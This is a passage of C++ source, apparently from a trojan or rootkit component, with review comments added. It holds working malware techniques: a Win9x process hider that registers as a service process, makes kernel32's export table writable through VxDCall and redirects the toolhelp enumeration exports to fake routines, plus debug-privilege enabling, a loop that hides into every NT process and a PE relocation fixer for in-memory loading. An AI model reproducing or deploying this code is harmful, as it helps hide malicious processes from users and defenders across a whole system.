// Good, we have an export table. Lets get it.
PIMAGE_EXPORT_DIRECTORY ped;
ped=(IMAGE_EXPORT_DIRECTORY *)RVATOVA(hModule,poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Get ordinal of desired function
int nOrdinal;
if(HIWORD((DWORD)lpProcName)==0) {
nOrdinal=(LOWORD((DWORD)lpProcName)) - ped->Base;
} else {
// Go through name table and find appropriate ordinal
int i,count;
DWORD *pdwNamePtr;
WORD *pwOrdinalPtr;
count=ped->NumberOfNames;
pdwNamePtr=(DWORD *)RVATOVA(hModule,ped->AddressOfNames);
pwOrdinalPtr=(WORD *)RVATOVA(hModule,ped->AddressOfNameOrdinals);
for(i=0;i<count;i++) {
// XXX should be a binary search, but, again, fuck it.
char *svName;
svName=(char *)RVATOVA(hModule,*pdwNamePtr);
if(lstrcmp(svName,lpProcName)==0) {
nOrdinal=*pwOrdinalPtr;
break;
}
pdwNamePtr++;
pwOrdinalPtr++;
}
if(i==count) return FALSE;
}
// Replace with different virtual address
// Look up RVA of this ordinal and replace with RVA of other function
DWORD *pAddrTable=(DWORD *)RVATOVA(hModule,ped->AddressOfFunctions);
DWORD dwOldAddr=(DWORD) RVATOVA(hModule,(pAddrTable[nOrdinal]));
pAddrTable[nOrdinal]=(DWORD) VATORVA(hModule,((DWORD)fpAddr));
return (FARPROC) dwOldAddr;
}
// Manual GetProcAddress() replacement: walks the PE export directory of an
// already-loaded module (hModule is used as the image base for every RVA)
// and resolves lpProcName either by ordinal (HIWORD of the pointer is 0, as
// with GetProcAddress) or by exported name. Returns NULL when hModule is
// NULL, the optional header has fewer than 16 data directories, the module
// has no export table, or a name is not found; otherwise the resolved VA.
// 32-bit only: pointers are truncated through DWORD casts.
// NOTE(review): unlike the name path, the ordinal path performs no range
// check -- an ordinal below ped->Base yields a negative nOrdinal, and one at
// or above Base+NumberOfFunctions indexes past the address table, so a
// missing ordinal is NOT reported as NULL (contrary to the description above).
// NOTE(review): forwarded exports (RVA pointing at a "DLL.Func" string inside
// the export section) are returned as if they were code addresses.
FARPROC GetDLLProcAddress(HMODULE hModule, LPCSTR lpProcName)
{
if(hModule==NULL) return NULL;
// Locate the optional header; OPTHDROFFSET is a project macro.
PIMAGE_OPTIONAL_HEADER poh;
poh = (PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET (hModule);
// Make sure the DataDirectory array is large enough to hold the export
// entry before indexing it.
int nDirCount;
nDirCount=poh->NumberOfRvaAndSizes;
// NOTE(review): FALSE here is the same value as NULL but every other failure
// path returns NULL; kept as-is for byte-identical behaviour.
if(nDirCount<16) return FALSE;
// No export table at all -> nothing to resolve.
if(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size==0) return NULL;
// Export directory is given as an RVA; RVATOVA turns it into a pointer.
PIMAGE_EXPORT_DIRECTORY ped;
ped=(IMAGE_EXPORT_DIRECTORY *)RVATOVA(hModule,poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// nOrdinal ends up as a zero-based index into AddressOfFunctions.
int nOrdinal;
if(HIWORD((DWORD)lpProcName)==0) {
// Ordinal lookup: exported ordinals are biased by ped->Base.
nOrdinal=(LOWORD((DWORD)lpProcName)) - ped->Base;
} else {
// Name lookup: AddressOfNames[i] is the RVA of the i-th name string and
// AddressOfNameOrdinals[i] is the matching (unbiased) index into
// AddressOfFunctions.
int i,count;
DWORD *pdwNamePtr;
WORD *pwOrdinalPtr;
count=ped->NumberOfNames;
pdwNamePtr=(DWORD *)RVATOVA(hModule,ped->AddressOfNames);
pwOrdinalPtr=(WORD *)RVATOVA(hModule,ped->AddressOfNameOrdinals);
for(i=0;i<count;i++) {
// Linear scan; the name table is sorted, so a binary search would also
// work, but the linear form is kept here.
char *svName;
svName=(char *)RVATOVA(hModule,*pdwNamePtr);
if(lstrcmp(svName,lpProcName)==0) {
nOrdinal=*pwOrdinalPtr;
break;
}
pdwNamePtr++;
pwOrdinalPtr++;
}
// Loop ran to completion without a match.
if(i==count) return NULL;
}
// Fetch the RVA of the function from the export address table.
DWORD *pAddrTable;
DWORD dwRVA;
pAddrTable=(DWORD *)RVATOVA(hModule,ped->AddressOfFunctions);
dwRVA=pAddrTable[nOrdinal];
// Check if it's a forwarder, or a local addr
// XXX Should probably do this someday. Just don't define forwarders. You're
// XXX not loading kernel32.dll with this shit anyway.
// NOTE(review): an unused export slot (RVA 0) is returned as the image base
// itself rather than NULL.
DWORD dwAddr;
dwAddr=(DWORD) RVATOVA(hModule,dwRVA);
return (FARPROC) dwAddr;
}
// Win9x-specific process hider (VxDCall and RegisterServiceProcess are Win9x
// kernel32 entry points). Steps, as written below:
//   1. resolve the undocumented VxDCall export by ordinal and
//      RegisterServiceProcess by name;
//   2. register this process as a "service process" (drops it from the task list);
//   3. make the pages holding kernel32's export address table writable through
//      a VxD service call;
//   4. copy the code between StartOfHappyCode and EndOfHappyCode (defined
//      elsewhere) to a fixed address in the shared arena and patch its
//      placeholder constants with the current PID and the original export
//      addresses;
//   5. redirect the toolhelp enumeration exports (Process32First/Next,
//      Thread32First/Next, Module32First/Next) to the copied Fake* routines;
//   6. call pMyMainProcess with this module's handle.
// Since kernel32's export table is shared by every process on Win9x, step 5
// affects all processes that resolve those exports afterwards. The Fake*
// routines themselves are outside this file section; presumably they filter
// the patched-in PID -- confirm there.
// Returns FALSE if VxDCall or RegisterServiceProcess cannot be resolved, NULL
// (same value as FALSE) if kernel32 has no export table, TRUE otherwise.
// Detection note: a kernel32 export whose resolved address lies outside the
// kernel32 image (here, inside the 0x9CDC0000 region) is the observable
// artefact of this hook.
BOOL CAPI::HideProcessIn9X(LPTHREAD_START_ROUTINE pMyMainProcess)
{
HMODULE hModule=GetModuleHandle("kernel32.dll");
// Ordinal 1 is resolved via the project's own export walker; the asm comment
// below calls it VxDCall0.
FARPROC VxDCall=GetDLLProcAddress(hModule,(LPCSTR)1);
if(!VxDCall)
{
DMsgBox("VxDCall is null");
return FALSE;
}
REGSERVICEPROC pfRegist=(REGSERVICEPROC)GetProcAddress(hModule,"RegisterServiceProcess");
if(!pfRegist)
return FALSE;
// NULL = current process, 1 = RSP_SIMPLE_SERVICE. Return value is not checked.
pfRegist(NULL,1);
// Check for kernel32.dll export table
PIMAGE_OPTIONAL_HEADER poh=(PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(hModule);
DWORD dwSize=poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
// NOTE(review): NULL in a BOOL-returning function; equals FALSE but is
// inconsistent with the other failure returns.
if(dwSize==0)
return NULL;
// Export directory, resolved from its RVA.
PIMAGE_EXPORT_DIRECTORY ped;
ped=(IMAGE_EXPORT_DIRECTORY *)RVATOVA(hModule,poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Change protection on kernel32.dll export table (make writable)
// (can't use "VirtualProtect")
// dwFirstPage: 4 KiB page number of the export address table's first entry.
// dwNumPages: page count covering the table (4 bytes per entry).
// NOTE(review): the in-page byte offset is multiplied by 4 together with the
// entry count, so dwNumPages over-counts when the table does not start on a
// page boundary -- harmless but probably unintended; confirm.
DWORD dwFirstPage, dwNumPages;
dwFirstPage=((DWORD)RVATOVA(hModule,ped->AddressOfFunctions))/4096;
dwNumPages=((( (((DWORD)RVATOVA(hModule,ped->AddressOfFunctions))-(dwFirstPage*4096)+ped->NumberOfFunctions)) *4)+4095)/4096;
//char sz[200];
//sprintf(sz,"hModule,VxDCall %d,dwFirstPage %d dwNumPages %d",hModule,VxDCall,dwFirstPage,dwNumPages);
//DMsgBox(sz);
// Arguments are pushed right-to-left for the VxD service named in the
// comments; the return value is not examined, so a refused permission change
// goes unnoticed and the export-table writes below fault.
// NOTE(review): nothing here pops the five pushed arguments after the call --
// confirm VxDCall's stack convention.
_asm {
push 020060000h // PC_WRITEABLE | PC_USER | PC_STATIC
push 0FFFFFFFFh // Keep all previous bits
push dword ptr [dwNumPages] // dword ptr [mbi+0Ch] # of pages
push dword ptr [dwFirstPage] // dword ptr [ped] page #
push 1000Dh // _PageModifyPermissions (win32_service_table #)
call dword ptr [VxDCall] // VxDCall0
}
// Get shared memory
// Size of the relocatable code blob delimited by the two marker symbols.
DWORD dwCodeSize=((DWORD)&EndOfHappyCode) - ((DWORD)&StartOfHappyCode);
LPVOID lpBase;
lpBase=VirtualAlloc((LPVOID)0x9CDC0000,dwCodeSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
// NOTE(review): if VirtualAlloc fails (NULL) or returns a different address,
// the result is discarded and the fixed address is used anyway, so the
// memcpy below may write to memory that was never committed.
if(lpBase!=(LPVOID)0x9CDC0000) lpBase=(LPVOID)0x9CDC0000;
// Copy code into shared memory
memcpy(lpBase,(void *)(&StartOfHappyCode),dwCodeSize);
// Capture the original export addresses before the table is rewritten; the
// copied code receives them through the placeholder patching below.
DWORD dwOldAddress[6],dwCurPid;
dwCurPid=GetCurrentProcessId();
dwOldAddress[0]=(DWORD)GetProcAddress(hModule,"Process32First");
dwOldAddress[1]=(DWORD)GetProcAddress(hModule,"Process32Next");
dwOldAddress[2]=(DWORD)GetProcAddress(hModule,"Thread32First");
dwOldAddress[3]=(DWORD)GetProcAddress(hModule,"Thread32Next");
dwOldAddress[4]=(DWORD)GetProcAddress(hModule,"Module32First");
dwOldAddress[5]=(DWORD)GetProcAddress(hModule,"Module32Next");
// Byte-stride scan of the copied blob for the 0x11111111..0x77777777 marker
// constants, replaced in place with the PID and the saved addresses.
// NOTE(review): the loop bound dwCodeSize-4 means the DWORD starting at the
// final offset dwCodeSize-4 is never inspected; and any of these constants
// occurring legitimately in the code would be clobbered too.
DWORD i;
for(i=0;i<(dwCodeSize-4);i++) {
DWORD *dwPtr=(DWORD *)((BYTE *)lpBase+i);
if (*dwPtr==0x11111111) *dwPtr=dwCurPid;
else if(*dwPtr==0x22222222) *dwPtr=(DWORD)dwOldAddress[0];
else if(*dwPtr==0x33333333) *dwPtr=(DWORD)dwOldAddress[1];
else if(*dwPtr==0x44444444) *dwPtr=(DWORD)dwOldAddress[2];
else if(*dwPtr==0x55555555) *dwPtr=(DWORD)dwOldAddress[3];
else if(*dwPtr==0x66666666) *dwPtr=(DWORD)dwOldAddress[4];
else if(*dwPtr==0x77777777) *dwPtr=(DWORD)dwOldAddress[5];
}
// Now we modify the export table to point to our replacement code
// Each target is the Fake* routine's offset within the original blob,
// rebased onto lpBase. SetDLLProcAddress (defined earlier in this file)
// returns the previous address; it is ignored here.
SetDLLProcAddress(hModule,"Process32First",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeProcess32First)));
SetDLLProcAddress(hModule,"Process32Next",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeProcess32Next)));
SetDLLProcAddress(hModule,"Thread32First",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeThread32First)));
SetDLLProcAddress(hModule,"Thread32Next",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeThread32Next)));
SetDLLProcAddress(hModule,"Module32First",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeModule32First)));
SetDLLProcAddress(hModule,"Module32Next",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeModule32Next)));
// Hand control to the caller-supplied routine; its return value is ignored.
pMyMainProcess(GetModuleHandle(NULL));
return TRUE;
}
/*******************************************************************
********************************************************************/
BOOL CAPI::EnableDebugPriv()
{
    // Enable SE_DEBUG_NAME on the current process token. Reports each
    // failing Win32 call through DMsgBox and returns FALSE when the token
    // cannot be opened, the privilege LUID cannot be looked up, or
    // AdjustTokenPrivileges() fails; the token handle is closed on every
    // path that opened it. A TRUE return only means the adjust call
    // succeeded -- AdjustTokenPrivileges() also succeeds when the token does
    // not hold the privilege at all (ERROR_NOT_ALL_ASSIGNED is not checked).
    HANDLE hToken = NULL;
    const DWORD dwAccess = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY;
    if (!OpenProcessToken(GetCurrentProcess(), dwAccess, &hToken))
    {
        DMsgBox("OPT() failed");
        return FALSE;
    }

    BOOL bEnabled = FALSE;
    TOKEN_PRIVILEGES tkp;
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    // Resolve the LUID straight into the privilege array rather than via a
    // temporary.
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid))
    {
        DMsgBox("LPV() failed");
    }
    else if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL))
    {
        DMsgBox("ATP() failed");
    }
    else
    {
        bEnabled = TRUE;
    }

    CloseHandle(hToken);
    return bEnabled;
}
// Enumerate every process through GetAll() and call HideProcessInNTbyID() on
// each, passing pMyMainProcess through. Returns the number of processes for
// which HideProcessInNTbyID() returned nonzero. _s_process_info_, GetAll and
// HideProcessInNTbyID are defined elsewhere in the project.
// NOTE(review): lNum is not compared against the capacity of spInfo's arrays
// here -- presumably GetAll() bounds it; confirm.
// NOTE(review): under _DEBUG, sprintf() into the 200-byte szMsg with
// szName[i] can overflow if a name exceeds roughly 170 bytes -- confirm the
// size of the szName entries.
long CAPI::HideProcessInNT_2_All(LPTHREAD_START_ROUTINE pMyMainProcess)
{
_s_process_info_ spInfo;
memset(&spInfo,0,sizeof(spInfo));
// lNum: number of entries GetAll() filled in.
long lNum=GetAll(&spInfo);
// lRet: successful hides.
long lRet=0;
for(int i=0;i<lNum;i++)
{
if(HideProcessInNTbyID(spInfo.lProcessID[i],pMyMainProcess))
{
lRet++;
#ifdef _DEBUG
char szMsg[200];
sprintf(szMsg,"hide in %s,id=%d ok!",spInfo.szName[i],spInfo.lProcessID[i]);
DMsgBox(szMsg);
#endif
}
else
{
#ifdef _DEBUG
char szMsg[200];
sprintf(szMsg,"hide in %s,id=%d error!",spInfo.szName[i],spInfo.lProcessID[i]);
DMsgBox(szMsg);
#endif
}
}
return lRet;
}
// Apply the PE base-relocation table of the image held in szBuf so that the
// image can run at lNewBase instead of lMyBase (its original ImageBase), and
// rewrite ImageBase in the optional header accordingly. Always returns TRUE;
// there is no failure path.
// RVAs are added directly to szBuf, so szBuf must hold the image in its
// in-memory (section-aligned) layout, not raw file layout -- confirm with the
// caller.
// NOTE(review): lLen is never used, so e_lfanew, the relocation directory RVA,
// each block's VirtualAddress and each SizeOfBlock are all unchecked against
// the buffer; a malformed or truncated image leads to out-of-bounds reads and
// writes, and a block whose size field is 0 never advances relocblock
// (infinite loop).
BOOL CAPI::FixRelocationTable(char *szBuf, long lLen,unsigned long lMyBase,unsigned long lNewBase)
{
//char a;UINT xxx;
// if(lMyBase==lNewBase)
// return TRUE;//neednt fix
// Relocation delta as an unsigned 32-bit value; a negative delta wraps and
// the modular additions below still produce the right result.
DWORD lAdd=lNewBase-lMyBase;
IMAGE_DOS_HEADER *ppeDosHead=(IMAGE_DOS_HEADER *)szBuf;//dos head
IMAGE_NT_HEADERS32 *ppeHead=(IMAGE_NT_HEADERS32 *)(szBuf+ppeDosHead->e_lfanew);//PE head
ppeHead->OptionalHeader.ImageBase=lNewBase;
//int nSize=ppeHead->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
// Start of the .reloc data (RVA treated as an offset into szBuf).
char* p=ppeHead->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress+szBuf;
// IMAGE_RELOCATION (the COFF struct) is used as a stand-in for
// IMAGE_BASE_RELOCATION: VirtualAddress -> page RVA, SymbolTableIndex ->
// SizeOfBlock, and Type is the first entry of the WORD TypeOffset[] array
// that follows the 8-byte block header.
IMAGE_RELOCATION* relocblock=(IMAGE_RELOCATION*)(p);
//IMAGE_BASE_RELOCATION
// NOTE(review): duplicate of the assignment a few lines above.
ppeHead->OptionalHeader.ImageBase=lNewBase;
// Blocks are terminated by a zero page RVA.
while(relocblock->VirtualAddress)
{
// Base address of the 4 KiB page this block's entries are relative to.
void* page = (void *)((UINT)szBuf + (UINT)relocblock->VirtualAddress);
// Entry count: (SizeOfBlock - 8-byte header) / 2 bytes per entry.
long count = (relocblock->SymbolTableIndex - 8)/2;
for(int i=0; i<count; i++) {
// Entry i: low 12 bits = offset within page, high 4 bits = fixup type.
int n=*((WORD*)((char*)(&relocblock->Type)+i*sizeof(WORD)));
int offset = n & 0xFFF;
int type = n >> 12;
//---------------------------
// Debug-only bookkeeping: the rebased VA of this fixup is formatted but the
// DMsgBox that would show it is commented out, so this sprintf runs for
// every entry with no effect.
long test =(long)(char*)page+offset;
test-=(long)szBuf;
test+=lNewBase;
char szMsg[200];
sprintf(szMsg,"point->0X%X sozeofblock %d=0x%X",test,count,count);
//DMsgBox(szMsg);
//if((test>=0x3142000)&&(test<=0x3142004))
//{
// test=test;
//}
//---------------------------
switch(type) {
case IMAGE_REL_BASED_ABSOLUTE:
/* a NOP */
break;
// NOTE(review): HIGH and LOW are 16-bit fixups in the PE format; the 32-bit
// read-modify-write here also touches the two bytes after the field --
// confirm this is acceptable for the images being processed.
case IMAGE_REL_BASED_HIGH:
*(UINT *)((UINT)page+offset) += HIWORD(lAdd);
break;
case IMAGE_REL_BASED_LOW:
*(UINT *)((UINT)page+offset) += LOWORD(lAdd);
break;
// The common 32-bit fixup: add the full delta.
case IMAGE_REL_BASED_HIGHLOW:
*(UINT *)((UINT)page+offset) += lAdd;
//----------------------------
//xxx=*(UINT *)((UINT)page+offset);
//xxx-=lNewBase;
//xxx+=(long)szBuf;
//a=((char*)(xxx))[0];
//if(((a>='a')&&(a<='z'))||((a>='A')&&(a<='Z')))
//DMsgBox((char*)(xxx));
//-----------------------------
break;
default:
// Other fixup types (e.g. 64-bit DIR64) are silently skipped.
//("Unknown fixup type\n");
break;
}
}
// Advance to the next block by this block's SizeOfBlock.
relocblock = (IMAGE_RELOCATION *)((BYTE *)relocblock +
relocblock->SymbolTableIndex);
}
return TRUE;
}
//#include "Imagehlp.h"
// Stub. Intended as an alternative rebasing path built on Imagehlp's
// ReBaseImage() (its signature is kept in the comment below), but currently
// performs no work: all four parameters are unused and TRUE is returned
// unconditionally, so a caller cannot distinguish this from a successful
// fixup.
BOOL CAPI::FixRelocationTable2(char *szBuf, long lLen,unsigned long lMyBase,unsigned long lNewBase)
{
/* BOOL bRet=ReBaseImage(
PSTR CurrentImageName,
PSTR SymbolPath,
BOOL fReBase,
BOOL fRebaseSysfileOk,
BOOL fGoingDown,
ULONG CheckImageSize,
ULONG *OldImageSize,
ULONG_PTR *OldImageBase,
ULONG *NewImageSize,
ULONG_PTR *NewImageBase,
ULONG TimeStamp
)*/
return TRUE;
}